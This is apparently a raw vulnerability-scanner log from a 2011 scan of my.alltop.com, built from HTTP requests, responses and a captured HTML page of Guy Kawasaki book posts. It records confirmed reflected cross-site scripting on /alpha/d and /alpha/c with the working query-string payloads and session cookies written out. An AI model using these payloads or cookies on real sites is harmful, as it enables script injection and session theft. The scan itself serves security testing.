Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:28 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:29 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:29 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/d

/alpha/d CONFIRMED

http://my.alltop.com/alpha/d?'"--></style></script><script>alert(0x00017C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00017C)</script>

Request

GET /alpha/d?'"--></style></script><script>netsparker(0x00017C)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:28 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:29 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:29 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/c

/alpha/c CONFIRMED

http://my.alltop.com/alpha/c?'"--></style></script><script>alert(0x00018C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00018C)</script>

Request

GET /alpha/c?'"--></style></script><script>netsparker(0x00018C)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
